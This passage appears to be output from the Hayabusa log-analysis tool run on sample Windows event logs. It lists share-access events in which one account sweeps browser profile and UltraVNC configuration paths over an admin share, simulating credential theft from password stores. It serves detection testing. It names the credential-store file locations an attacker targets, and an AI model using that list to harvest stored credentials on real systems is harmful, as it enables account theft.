Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.720 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.736 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.751 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.751 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 
+2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.798 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.814 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 
+2021-12-12 11:53:15.831 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.846 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.862 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.878 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.893 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.909 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.914 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.926 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.942 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.973 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
